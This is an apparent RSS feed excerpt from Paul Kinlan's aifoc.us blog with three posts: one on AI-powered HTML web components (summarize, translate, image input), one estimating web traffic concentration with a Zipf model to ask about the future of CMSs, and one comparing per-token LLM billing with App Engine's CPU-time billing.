<p>This got me thinking. It&rsquo;s great that you can use JavaScript to wrangle these high-level APIs, but it also made me consider if there are even higher-level abstractions that we should be thinking about, like HTML.</p>
<p>It feels like there is a massive opportunity to either imbue existing elements and components with these capabilities or even to conceive of new elements altogether, and it&rsquo;s something that I think we should talk about more.</p>
<p>With this in mind, I&rsquo;ve <a href="https://github.com/PaulKinlan/ai-wc">created three simple examples</a>: Summarize, Translate, and Image picking.</p>
<p>The summarize element&rsquo;s goal is to act like the commit message generator in VS Code. You provide the ID of an element to watch for changes, and it will summarize the content. The best part is that it uses <a href="https://developer.mozilla.org/en-US/docs/Web/API/ElementInternals">ElementInternals</a> to enable the element to participate in <code>&lt;form&gt;</code> submissions.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">ai-summarize-component</span> <span style="color:#a6e22e">watch</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;longTextElement&#34;</span>&gt;&lt;/<span style="color:#f92672">ai-summarize-component</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">textarea</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;longTextElement&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">rows</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;4&#34;</span> <span style="color:#a6e22e">cols</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;50&#34;</span>&gt;&lt;/<span style="color:#f92672">textarea</span>&gt;
</span></span></code></pre></div><figure><img src="/images/ai-summarize.gif"
    alt="AI Summarize a textarea"><figcaption>
      <p>AI Summarize a textarea</p>
    </figcaption>
</figure>
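<p>The form participation part is the bit that is easy to miss, so here is a minimal sketch of a form-associated custom element. It is not the code from the demo repo: the function name, tag name, and the <code>Base</code> and <code>registry</code> parameters are assumptions (the parameters exist only so the sketch can run outside a browser).</p>

```javascript
// Sketch of a form-associated custom element. In a page you would pass
// HTMLElement as `Base` and customElements as `registry`.
function defineSummaryField(Base, registry, tagName = "summary-field-sketch") {
  class SummaryField extends Base {
    // Opt in to form participation.
    static formAssociated = true;
    #internals;

    constructor() {
      super();
      // attachInternals() returns the ElementInternals for this element.
      this.#internals = this.attachInternals();
    }

    // Set this to the generated summary; the enclosing form then submits
    // the text under this element's name attribute.
    set value(text) {
      this.#internals.setFormValue(text);
    }
  }
  registry.define(tagName, SummaryField);
  return SummaryField;
}

// In a browser:
// defineSummaryField(HTMLElement, customElements);
```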

<p>The translate element is a <code>HTMLParagraphElement</code> that detects the language of its content and then offers to translate it into the user&rsquo;s preferred language. It uses both the <a href="https://developer.chrome.com/docs/ai/translator-api">Translate API</a> and <a href="https://developer.chrome.com/docs/ai/language-detection">LanguageDetection API</a> to do this.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">ai-translate-component</span>&gt;
</span></span><span style="display:flex;"><span>  私はティーポットです と とても幸せです
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">ai-translate-component</span>&gt;
</span></span></code></pre></div><figure><img src="/images/ai-translate-demo.gif"
    alt="AI Translate a paragraph Element"><figcaption>
      <p>AI Translate a paragraph Element</p>
    </figcaption>
</figure>
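<p>The detect-then-translate flow can be sketched roughly as follows. Again, this is not the component&rsquo;s source: the function name and the <code>apis</code> parameter are assumptions for illustration, with the defaults resolving to the built-in <code>LanguageDetector</code> and <code>Translator</code> globals where a browser exposes them. A real component would also need to handle unsupported language pairs.</p>

```javascript
// Sketch: detect a paragraph's language and translate it into the user's
// preferred one. `apis` is injected (an assumption) so the flow can be run
// outside the browser.
async function translateForUser(
  text,
  targetLanguage,
  apis = {
    detector: globalThis.LanguageDetector,
    translator: globalThis.Translator,
  },
) {
  if (!apis.detector || !apis.translator) return null;

  const detector = await apis.detector.create();
  // detect() resolves to candidate languages, most likely first.
  const [best] = await detector.detect(text);
  if (!best || best.detectedLanguage === targetLanguage) return text;

  const translator = await apis.translator.create({
    sourceLanguage: best.detectedLanguage,
    targetLanguage,
  });
  return translator.translate(text);
}

// In a supporting browser:
// translateForUser(paragraph.textContent, navigator.language);
```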

<p>Maybe we will finally get an answer to the bug I filed years <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=872770">ago about Google Translate breaking React</a> as developers will have a way to integrate translation into their apps exactly as they need it, versus the shotgun approach of the current Google Translate in Google Chrome.</p>
<p>I also like to think about how form elements might integrate with technologies like generative LLMs. For example, consider the humble <code>&lt;input type=&quot;file&quot; accept=&quot;image/png&quot; /&gt;</code>. If we assume image generation is here to stay, should we consider enabling deeper integration into the file and content pickers? If so, this would mean you no longer have to generate an image in one app, download it, find it, and then upload it.</p>
<p>Well, <code>&lt;ai-image-input&gt;</code> is a demo of an optimization for that.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">form</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;imageInputForm&#34;</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">ai-image-input</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;image&#34;</span>&gt;&lt;/<span style="color:#f92672">ai-image-input</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">form</span>&gt;
</span></span></code></pre></div><p>It acts like a normal form element, but when you press Option (on a Mac), a new set of features is enabled, allowing you to attach an image generated from a prompt. Note that there is no on-device generation in this demo; it&rsquo;s handled by a server.</p>
<figure><img src="/images/ai-image-upload.gif"
    alt="AI Image Input Element"><figcaption>
      <p>AI Image Input Element Demo</p>
    </figcaption>
</figure>

<p>I think the file input is a very neat use case that could be extended to video. It also reminds me of one of the goals of Web Intents: allowing deeper integration of the browser with system services and user-preferred applications, eliminating the need to leave the browser, download a file, and then re-upload it.</p>
<p>There are a lot of other user interface features that I could imagine being useful as a built-in part of the platform. For example:</p>
<ul>
<li><code>&lt;a href=&quot;https://paul.kinlan.me&quot; summarize&gt;</code> could enable the user agent to fetch the URL and summarize it for the user. Given CSP and other security concerns, this would be something only a user agent provided element could manage today.</li>
<li><code>&lt;a href=&quot;...&quot; extract-info=&quot;recipe-time&quot;&gt;</code> could display &ldquo;Cook time: 45 mins&rdquo; on hover or inside the element if the link points to a recipe, or <code>&lt;a href=&quot;...&quot; extract-info=&quot;product-price&quot;&gt;</code> could show the price and rating for a product link.</li>
<li><code>&lt;a href=&quot;asdf.com&quot; clarify-purpose&gt;Click here&lt;/a&gt;</code> might be an interesting way to improve vague link text like &ldquo;Click here&rdquo; or &ldquo;Read more,&rdquo; because the browser could fetch the destination&rsquo;s content to generate a more descriptive label for screen readers (this might just be a good thing for an extension to do instead).</li>
<li><code>&lt;a href=&quot;asdf.com&quot; add-to-calendar&gt;Event page&lt;/a&gt;</code> would be fun: if the browser knows that the link points to an event page, it could parse the page for a date, time, and location and present a native UI to add the event to the user&rsquo;s default calendar, streamlining a common, multi-step process.</li>
<li><code>&lt;input type=&quot;file&quot; extract=&quot;invoice-details&quot;&gt;</code> could allow a user to upload a PDF of an invoice, and the browser could use an LLM to automatically parse and populate fields for the date, amount, and vendor, simplifying expense reporting or data entry tasks.</li>
<li><code>&lt;input type=&quot;text&quot; transcribe&gt;</code> could enable the user agent to transcribe audio into text by offering a microphone button that would record audio.</li>
<li>Should we have a dedicated <code>&lt;input type=&quot;prompt&quot;&gt;</code> or <code>&lt;input type=&quot;chat&quot;&gt;</code> that might offer a user affordance like <code>&lt;input type=&quot;search&quot;&gt;</code> offers? Could it hook into a user-configured default chat provider?</li>
<li>An attribute like <code>&lt;img identify-objects&gt;</code> could allow the browser to recognize objects within an image and then expose them to the user as a list of tags or descriptions, enhancing accessibility and searchability.</li>
<li>A <code>&lt;video describe&gt;</code> attribute could automatically generate and voice an audio description of the visual events happening on screen, not just closed captions as a transcription.</li>
<li>A textarea could be enhanced with an attribute that hints at the type of content expected, like <code>&lt;textarea suggestions=&quot;creative-writing&quot;&gt;</code> or <code>&lt;textarea suggestions=&quot;code-completion&quot;&gt;</code>. Much like how you can tell the browser the type of <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/Global_attributes/inputmode">input mode</a>, the browser could then offer context-aware autocompletion or creative prompts to help the user.</li>
</ul>
<p><strong>Update</strong> After posting this, I also experimented with an <code>&lt;ai-date-component&gt;</code> that lets you write a date in natural language and parses it into a date object.</p>
<figure><img src="/images/ai-date.gif"
    alt="AI Date Component Demo"><figcaption>
      <p>AI Date Component Demo</p>
    </figcaption>
</figure>

<p><strong>End Update</strong></p>
<p>Should the default elements be imbued with AI capabilities? Or should these all just live in user-land as custom-elements or Components in the framework of your choice? We certainly are starting to get more of the technology to do this all in the browser, whether it&rsquo;s the improvements to Web Components or the new AI-based APIs, but I don&rsquo;t actually know the answer.</p>
<p>I do believe that this is an area that needs a lot more discussion, and it is something browser vendors and spec authors should really start thinking about too.</p>
<hr>
<p>The source to the demo web components is available on my github: <a href="https://github.com/PaulKinlan/ai-wc">https://github.com/PaulKinlan/ai-wc</a></p>
]]></content:encoded></item><item><title>Whither CMS?</title><link>https://aifoc.us/whither-cms/</link><pubDate>Sat, 05 Jul 2025 21:47:22 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/whither-cms/</guid><description>&lt;p>When I moved to North Wales I noticed how many of the local businesses were solely on Facebook and Instagram. I spoke to some of them to ask why they don&amp;rsquo;t have a site and it came down to four common issues 1) cost, 2) built in network, 3) skill, and 4) time. It&amp;rsquo;s hard to beat free, good enough, and access to a network of potential customers. At the same time nearly everyone that I spoke to knew it wasn&amp;rsquo;t a perfect situation and they wouldn&amp;rsquo;t say &amp;rsquo;no&amp;rsquo; to their own independent presence.&lt;/p></description><content:encoded><![CDATA[<p>When I moved to North Wales I noticed how many of the local businesses were solely on Facebook and Instagram. I spoke to some of them to ask why they don&rsquo;t have a site and it came down to four common issues 1) cost, 2) built in network, 3) skill, and 4) time. It&rsquo;s hard to beat free, good enough, and access to a network of potential customers. At the same time nearly everyone that I spoke to knew it wasn&rsquo;t a perfect situation and they wouldn&rsquo;t say &rsquo;no&rsquo; to their own independent presence.</p>
<p>CMSs offer a path for people without the skill or the time to get their own place on the web, and this is amazing. Yet for many people I spoke to it&rsquo;s still a hurdle to think about what a domain name is (let alone paying for it), how sites should work, and the designs etc. They did know what they wanted their sites to say though (name, address, pictures, booking forms, contact details).</p>
<p>I&rsquo;m interested in the health of the web and I think that LLMs will help make it significantly easier to create and produce content on the web (and the web is a perfect medium for people to be able to create and share ideas), but what does that mean for CMSs?</p>
<p>I decided to try and do some analysis on the usage of certain tools across the ecosystem, and I wanted to see what the adoption is of certain technology stacks, such as CMSes and frameworks, mapped against how people use the web.</p>
<p>It&rsquo;s incredibly hard to get this data publicly, so what I am about to show you takes a number of leaps to try and interpret the data. So, without further ado, let&rsquo;s go a-leapin&rsquo;.</p>
<p>First up is time spent on the web. <a href="https://pro.similarweb.com/#/digitalsuite/markets/webmarketanalysis/mapping/All/999/3m?webSource=Total">SimilarWeb&rsquo;s ranking of the top 100 sites</a> includes both the average time spent and number of navigations per month to each of the top 100 sites. It is the most useful data that I&rsquo;ve found and <a href="https://docs.google.com/spreadsheets/d/18cEessx2d291daGwFBQTIY_MqemTp6dWWQYXf8OSutI/edit?gid=0#gid=0">you can see the number of navigations follows a trend that looks like Zipf&rsquo;s law</a> (<a href="https://www.parse.ly/zipfs-law-of-the-internet-explaining-online-behavior/">Parse.ly</a> also had a good article from a couple of years ago). SimilarWeb only accounts for the top 100 sites and the web extends out to roughly <a href="https://www.wix.com/blog/how-many-domains-are-there#:~:text=According%20to%20Domain%20Name%20Stat,increase%20from%20Q4%20of%202021.">350 million origins</a> (as of 2023), so we will have to do some extra work. It won&rsquo;t change the shape of the graph, but it will change where each percentile of navigations falls.</p>
<figure><img src="/images/zipf.png"
    alt="Navigations predicted using zipf vs SimilarWeb"><figcaption>
      <p>Navigations predicted using zipf vs SimilarWeb</p>
    </figcaption>
</figure>

<aside>Navigations are an imperfect measure of internet usage because time is not spent equally across sites, especially if you compare Google's goal of getting you off the site as quickly as possible with Facebook's goal of keeping you on site. It is the best absolute measurement that I can find. </aside>
<p><em>If</em> we assume that this distribution is directionally accurate and use SimilarWeb&rsquo;s prediction for the top site&rsquo;s monthly traffic of 83,000,000,000 navigations, then you can compute the estimated monthly traffic for the 2nd most popular site&hellip;. Doing this all the way to the 360 millionth web site you can infer that roughly 50% of the web&rsquo;s traffic is sent to the top 17 sites. The 75th percentile accounts for 451 sites, the 90th percentile 27,219 sites, and the 95th percentile 426,494 sites.</p>
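<p>As a rough sketch of that step, assuming a Zipf exponent of 1.2 (the value used in the calculation later in this post), the estimate for any rank is the top site&rsquo;s traffic divided by the rank raised to that exponent. The helper name <code>estimateNavigations</code> is made up for illustration:</p>

```javascript
// Zipf-style estimate of monthly navigations for a site at a 1-based rank.
// `estimateNavigations` is an illustrative name, not part of any library.
const estimateNavigations = (topSiteNavigations, rank, alpha) =>
  topSiteNavigations / Math.pow(rank, alpha);

const topSiteNavigations = 83_000_000_000; // SimilarWeb figure for the top site
const zipfAlpha = 1.2; // assumed exponent; it only roughly fits the top 100

// The 2nd most popular site comes out at roughly 36 billion navigations.
const second = estimateNavigations(topSiteNavigations, 2, zipfAlpha);
console.log(`Rank 2: ~${(second / 1e9).toFixed(1)} billion navigations`);
```

<p>Under those assumptions the 2nd site gets a bit under half the traffic of the 1st, which is why the totals concentrate so quickly.</p>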
<p>A more traditional way to look at the data is through the Top orders of magnitude. So, the Top 1,000 sites account for 78.94% of navigations; the Top 10,000 is at 87.38%; the Top 100,000 is at 92.71% and the Top 1,000,000 is at 96.07%.</p>
<p>Kinda mind blowing to think about where people spend their time (I should look at this data over time and see how quickly the web is centralizing).</p>
<p>For completeness, here is the <a href="https://gist.github.com/PaulKinlan/a091b7c52f3a7cc43d081cc79f945c63">code</a> I used to do the calculation (please feel free to critique the methodology).</p>
<pre tabindex="0"><code>const alpha = 1.2; // 1.2 seems to map well to top 100 sites... Maybe it works for rest of web?
const size = 360_000_000; // 360 million is the number of sites in the web as of 2023
/*
83 billion is the number of navigations for rank 1 (the most popular site)
for one month in 2025 (yes, I know I don&#39;t have the size of the web
for 2025, but this is a good estimate based on current trends).
*/

const max = 83_000_000_000;

// Zipfian estimate of the value at a 1-based rank, given the value at rank 1 and alpha.
const valueAtRank = (valueAt1, rank, alpha) =&gt; {
  return valueAt1 / Math.pow(rank, alpha);
};

/*
 Calculate the total number of navigations following a Zipfian distribution.
*/
let sum = 0;

for (let i = 0; i &lt; size; i++) {
  // Rank 1 (i = 0) has the max value.
  // Alpha is the Zipfian constant, 1.2 is a good value looking at SimilarWeb
  const value = Math.floor(valueAtRank(max, i + 1, alpha));
  sum += value;

  if (sum &gt; Number.MAX_SAFE_INTEGER) {
    // Precision is lost beyond this point, so stop rather than report a wrong total.
    throw new Error(&#34;Sum exceeded MAX_SAFE_INTEGER&#34;);
  }
}

console.log(`Sum of generated values: ${sum}`);

/*
Calculate the rank at a given percentile.
This function finds the rank that corresponds to a given percentile
based on the cumulative sum of values generated by the Zipfian distribution.
It iterates through ranks, accumulating their values until it reaches the
target value for the specified percentile.
*/
const rankAtPercentile = (percentile, size, sum) =&gt; {
  const target = sum * (percentile / 100);
  let cumulativeSum = 0;
  for (let i = 1; i &lt; size; i++) {
    cumulativeSum += valueAtRank(max, i, alpha);
    if (cumulativeSum &gt;= target) {
      return i;
    }
  }
  return size; // If no rank found, return the size as the last rank
};

// Percentage of the total that is accumulated over the ranks before `rank`.
const percentageAtRank = (rank, sum) =&gt; {
  let cumulativeSum = 0;
  for (let i = 1; i &lt; rank; i++) {
    cumulativeSum += valueAtRank(max, i, alpha);
  }
  return (cumulativeSum / sum) * 100;
};

console.log(rankAtPercentile(50, size, sum));
console.log(rankAtPercentile(75, size, sum));
console.log(rankAtPercentile(90, size, sum));
console.log(rankAtPercentile(95, size, sum));

console.log(`Rank 1000 is at ${percentageAtRank(1000, sum)}%`);
console.log(`Rank 10000 is at ${percentageAtRank(10000, sum)}%`);
console.log(`Rank 100000 is at ${percentageAtRank(100000, sum)}%`);
console.log(`Rank 1000000 is at ${percentageAtRank(1000000, sum)}%`);
</code></pre><p>Now that we have some interesting data about how traffic flows around the web, let&rsquo;s see how the sites in the Top <em>[insert your order of magnitude here]</em> are built (<a href="https://builtwith.com/">Builtwith.com</a> and <a href="https://httparchive.org/reports/techreport/tech?tech=WordPress,Shopify,Wix,Joomla,Drupal,Squarespace,PrestaShop,Webflow,1C-Bitrix,Tilda&amp;geo=ALL&amp;rank=Top+1k">The Chrome UX technology dashboard</a> are an absolute goldmine of useful information.) You can see that <a href="https://httparchive.org/reports/techreport/tech?tech=WordPress,Shopify,Wix,Joomla,Drupal,Squarespace,PrestaShop,Webflow,1C-Bitrix,Tilda&amp;geo=ALL&amp;rank=Top+1k">the popular CMSs just aren&rsquo;t used across the top 1000 sites</a>, and this is confirmed when you dive into BuiltWith&rsquo;s reports (<a href="https://trends.builtwith.com/cms/">Top 1m</a>, <a href="https://trends.builtwith.com/cms/WordPress">WordPress</a>, <a href="https://trends.builtwith.com/cms/Drupal">Drupal</a>, <a href="https://trends.builtwith.com/cms/Joomla!">Joomla</a>, <a href="https://trends.builtwith.com/cms/Squarespace">Squarespace</a>, <a href="https://trends.builtwith.com/cms/Wix">Wix</a>). It&rsquo;s often not until you get to the top 1 million sites that you start to see a significant amount of usage in the ecosystem, but the top 1 million sites is not where the majority of the navigations are.</p>
<aside>Interestingly, according to BuiltWith all CMSs have seen a decline in usage across the Top 1m sites since about 2021. Odd.</aside>
<p>Looking at WordPress, the most popular site building tool, you do see usage increase in the top 10,000 sites and it clearly grows in popularity through the top 1,000,000, but at some point you have to question stats like &ldquo;40% of all sites&rdquo; and realise that it&rsquo;s certainly not 40% of traffic and time spent by people using the web.</p>
<p>It&rsquo;s not until after the top 1,000,000 that you really start to see the growth in the CMSs. My hunch broadly is that while many of the companies who build CMSes (I struggle with the plural here&hellip; CMSi?) will have a few very large sites as customers, the vast majority of customers are the tiny sites that get small amounts of traffic.</p>
<aside>I need to recognise a potential confirmation bias that I might have here. When I ran a small shared-hosting company we threw more sites on a single server than it could handle if they all got popular. That was because we knew that the vast majority of the customers would get almost 0 traffic. I see the same thinking in the industry today.</aside>
<p>This is one of the things I love about the web, you can still get found and share your knowledge and build a community even if you are outside of the Top 100,000,000.</p>
<p>Ok &hellip; we are this far in and I&rsquo;ve not made my point. Here goes&hellip; If you believe that LLMs are going to make it easier for people to build sites, then I think CMSs of today might be in real trouble and will need to adapt.</p>
<p>We&rsquo;re seeing lots of new tools coming up where the idea is that you can build a site just by describing what you want to do, whether that&rsquo;s <a href="https://lovable.dev/">Lovable</a>, <a href="https://stitch.withgoogle.com/">Stitch</a> or any of the other hundreds of tools that are coming out. Heck, even I built a tool as an experiment with generative site building: <a href="http://makemy.blog">makemy.blog</a>. There are also tools or Canvases being built into the chat clients that enable you to experiment with a site design and share it with friends, and then there are tools like <a href="https://youtu.be/GjvgtwSOCao">AI Studio</a> or <a href="https://www.anthropic.com/news/claude-powered-artifacts">Claude Artifacts</a> that will build simple sites and let you put them on the public web instantly.</p>
<p>The great thing about these types of tools is that you can just try it, iterate on it and get a design or layout or style that is unique to you and you don&rsquo;t feel stupid for just trying things and you don&rsquo;t have to spend any money. Many of the people that I spoke to about their Facebook presence know what they want on a site, it&rsquo;s just that it&rsquo;s instant and simple on Facebook (and you get instant reach and distribution) whereas on the web, you would frequently have to sign up for a service, pick one of the generic stock-templates, enter your credit card&hellip; urgh.</p>
<p>The sheer fact that as a regular person you can describe the type of site you want to get on the web and what data it will show, is incredible, so much so that I think we are going to see an explosion in tools that can create compelling looking sites and experiences and just let normal web users design and iterate.</p>
<p>Are these generated sites the most beautiful and creative representation of the web? No, not yet. Are they better than being hosted in a walled garden? 100%! This is a massive positive for the web. The Web has always been easier to build for than native platforms, but it&rsquo;s never been as easy as posting your presence on Facebook. CMSs made it easier and I believe that Canvases or the new breed of web-design tools are going to massively lower the cost and complexity of getting a good web presence online.</p>
<p>So where do the current CMSs and hosting platforms innovate?</p>
<p>I think it&rsquo;s tough. For a huge number of sites, such as a person&rsquo;s local small business, people don&rsquo;t need the full suite of services that CMSs and hosted CMSs offer, but in a lot of cases that is what they have to pick.</p>
<p>The new crop of tooling is showing that you can quickly iterate on designs that are custom and personal to each individual, so I think there will need to be a move away from the cookie-cutter theme templates and enable people to personalise their own experiences instantly.</p>
<p>I can also imagine improvements to instant iteration on entire site design and smoothing out the ability to experiment for free. I don&rsquo;t know the usage of <a href="https://wordpress.org/playground/">WordPress Playground</a>, but my own experience with it is that I can get a feel for how everything works in WordPress without having to subscribe to any service, or hand over my credit card (or any of the other things companies do to try and get you to convert into a paying customer).</p>
<p>Price is one area where I hope there is a lot of competition. It&rsquo;s one of the biggest reasons I hear for people not to put a presence online. Yes there are issues today with <a href="/token-slinging/">tokens</a> as a unit of cost, but the costs of generation are coming down. At the same time the <a href="https://aifoc.us/latency/">latency</a> is improving so much that it&rsquo;s not just the cost of running the service that drops: the cost to the person using the tool drops dramatically too (I can try 10 designs in an hour vs 1 in an evening).</p>
<p>Domain names might also be another opportunity for improvement: they are a recurring annual cost and a point of confusion for many people.</p>
<p>I&rsquo;m not in the CMS business directly, so you can see that I&rsquo;m short of specific ideas, other than I think we are going to see a lot more competition coming through and that I think this is good for the industry&hellip; mostly&hellip;.</p>
<p>I&rsquo;d love to get your thoughts on the state of the CMS ecosystem and where you think the opportunities are. <a href="mailto:paul@aifoc.us">Hit me up</a>! For a future edition of aifoc.us, I think there will be a knock-on effect to the agencies that service small businesses so I&rsquo;m starting to think about how the Agency ecosystem will be impacted and maybe where it needs to change.</p>
<hr>
<p><em>Thank you to Terry Pollard for spotting a number of typos and errors in this post.</em></p>
]]></content:encoded></item><item><title>token slinging</title><link>https://aifoc.us/token-slinging/</link><pubDate>Mon, 30 Jun 2025 10:00:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/token-slinging/</guid><description>&lt;p>17 years ago I discovered Google App Engine. It was the first truly scalable &amp;ldquo;serverless&amp;rdquo; platform that I had ever seen. I could just write an HTTP handler and it would scale to meet the demand.&lt;/p>
&lt;p>It was also the first time in computing where I experienced a direct relationship with the cost of my code running. Prior to this every service I built was compartmentalized to a physical server. I was used to building software and algorithms for this model. Database contention, process contention, C10k, etc, were all things that I had to plan for. Yes, we developed our algorithms to avoid those problems, but we tended to scale by estimating the total QPS per box and when you hit a limit you would just buy another box and stick it in the rack.&lt;/p></description><content:encoded><![CDATA[<p>17 years ago I discovered Google App Engine. It was the first truly scalable &ldquo;serverless&rdquo; platform that I had ever seen. I could just write an HTTP handler and it would scale to meet the demand.</p>
<p>It was also the first time in computing where I experienced a direct relationship with the cost of my code running. Prior to this every service I built was compartmentalized to a physical server. I was used to building software and algorithms for this model. Database contention, process contention, C10k, etc, were all things that I had to plan for. Yes, we developed our algorithms to avoid those problems, but we tended to scale by estimating the total QPS per box and when you hit a limit you would just buy another box and stick it in the rack.</p>
<p>App Engine however could scale to meet any demand I could throw at it. I just didn&rsquo;t have to worry about any of the physical limitations or other constraints that I had previously worked with. It was a new world for me. I just had to deal with this one weird thing: A new billing model based on <a href="https://web.archive.org/web/20090227045111/http://code.google.com/appengine/docs/quotas.html">CPU time</a>.</p>
<p>The more money that I could spend in the moment, the more access to CPU time I had. It was such an interesting model for me. What if I get popular? I&rsquo;m just using this as a side-project&hellip; In the &ldquo;old days&rdquo;, my box would just grind to a halt and I would make a decision to either upgrade the box or buy another one. Now, what should I do? Should I charge my customers using a similar model? How would I explain that?</p>
<p>Ultimately, I chose not to follow that model for billing my customers. I felt that my customers would have no understanding of the model and would instead say &ldquo;hey, it&rsquo;s not our fault you use too many cycles to process a request&rdquo;, and a normal per-month tiered SaaS model would be much easier. This model led me down a rabbit hole that I still reflect on a lot. My margin was the difference between what a standard user paid and the compute it took to process their requests, and this led me down an optimization path that I never thought about before, but couldn&rsquo;t get out of my head. CPU time cost me real money, so I needed to reduce it on a per-user basis.</p>
<p>I did some back-of-the-envelope calculations and I realized that if I shaved off 100ms of CPU from my request handler, I would save tens of dollars a day (this was a lot for me at the time). I started to think about how I could optimize my code to get the CPU time down, lots of micro-optimizations here and there, and as I deployed each new version I could see the CPU time drop.</p>
<p>I felt like an absolute genius. <a href="https://glaforge.dev/posts/2011/09/01/google-app-engine-s-new-pricing-model/">Then App Engine changed their billing model</a>&hellip;. hah.</p>
<p>Jump forward 17 years and I&rsquo;m building software and using LLMs all the time to help me. They chew through bootstrapping of projects, bug fixes and even new features. I&rsquo;m sold on the model and the gains that I personally get from it. Granted, I&rsquo;m not a typical engineer; I&rsquo;m a manager and I&rsquo;ve spent a lot of time <em>not building</em> things over the last couple of years, but these tools have changed my life.</p>
<p>It feels like a real moment of change. &ldquo;Normal Businesses&rdquo; can be relatively rational when it comes to controlling costs, so my logical assumption is that if the companies are spending the money (and I&rsquo;m hearing that they are), they have likely costed it out and they must feel that they are getting a return on investment. I hear from people in the wider-ecosystem that lots of companies have blanket deals with LLM providers to enable all of their employees to use LLMs all day, and when there isn&rsquo;t a corporate deal, some companies give their teams budgets of a hundred dollars <em>a day</em> to use these tools.</p>
<p>Inference trends seem to indicate that there is more usage happening. I find OpenRouter&rsquo;s trends fascinating. They are a service that provides access to a wide range of LLMs, and they have been tracking the usage of these models across their platform. You can see the trends in usage, <a href="https://openrouter.ai/rankings">the most popular models</a>, and even the <a href="https://openrouter.ai/#:~:text=View%20docs-,Top%20Apps,-Largest%20public%20apps">top applications that are using these models</a>.</p>
<figure><img src="/images/openrouter.png"
    alt="OpenRouter Inference Trends"><figcaption>
      <p>OpenRouter Inference Trends</p>
    </figcaption>
</figure>

<figure><img src="/images/openrouter-topapps.png"
    alt="OpenRouter Inference Trends - Top Apps for the month"><figcaption>
      <p>OpenRouter Inference Trends - Top Apps for the month</p>
    </figcaption>
</figure>

<p>Looking at the numbers today (June 18th), 1 trillion tokens are processed by OpenRouter alone in a week and looking at programming, <a href="https://openrouter.ai/rankings/programming?view=week">there are at least 500 billion tokens processed in a week</a>. And this is data from just one service. Mind blowing.</p>
<p>As LLMs chew through teraflops of compute, it seems like the token <em>is</em> the current best model for billing. When models are less intensive to run the tokens tend to be cheaper (Gemini Flash) and more expensive when they are doing more. Per token billing is the new CPU time billing.</p>
<p>It raises a number of questions for me as a web developer.</p>
<p>Firstly, for web developers selling a service that interfaces with an LLM, how do you bill? Like CPU time, tokens just aren&rsquo;t a measure that any normal person will understand, and they should probably never have to understand. We are going to see a lot of iteration in this space. For example, I run an RSS summary service called <a href="https://tldr.express">tldr.express</a>. It&rsquo;s small enough that I can eat the cost of running every RSS feed that is subscribed to through the LLM. But when I reach 1000 users, then what? I don&rsquo;t think there is any way that I could add a margin on top of my direct token cost. I would have to think about a more traditional SaaS model and hope people use the service but not too much&hellip; Kinda like how I used to think about CPU time.</p>
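<p>To make the margin problem concrete, here is a minimal sketch of a flat monthly plan set against per-token costs. Every number and name in it (<code>estimateMonthlyMargin</code>, <code>breakEvenTokensPerUser</code>, the price, the token counts) is invented for illustration and is not tldr.express data or any provider&rsquo;s real pricing:</p>

```javascript
// All figures are hypothetical; plug in your own plan price and provider rates.
const estimateMonthlyMargin = ({
  users,
  pricePerUserPerMonth, // flat SaaS price charged to each user
  tokensPerUserPerMonth, // average tokens processed for one user
  costPerMillionTokens, // what the model provider charges the service
}) => {
  const revenue = users * pricePerUserPerMonth;
  const tokenCost =
    ((users * tokensPerUserPerMonth) / 1_000_000) * costPerMillionTokens;
  return { revenue, tokenCost, margin: revenue - tokenCost };
};

// Tokens a single user can consume before they cost more than they pay.
const breakEvenTokensPerUser = (pricePerUserPerMonth, costPerMillionTokens) =>
  (pricePerUserPerMonth / costPerMillionTokens) * 1_000_000;

const plan = {
  users: 1000,
  pricePerUserPerMonth: 5,
  tokensPerUserPerMonth: 2_000_000,
  costPerMillionTokens: 0.5,
};

console.log(estimateMonthlyMargin(plan));
console.log(breakEvenTokensPerUser(5, 0.5));
```

<p>The flat plan only works while the average user stays under the break-even token count, which is the &ldquo;use the service but not too much&rdquo; hope in code form.</p>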
<p>This per-token billing creates an incentive for service owners to move more of the processing <a href="/on-device">on-device</a> at the user&rsquo;s expense. I&rsquo;m not sure how I feel about this given the trade-off in terms of device capability and quality of today&rsquo;s models. As web developers we will need more tools that will let us eval and balance the quality of on-device processing vs the cost and quality of using various services.</p>
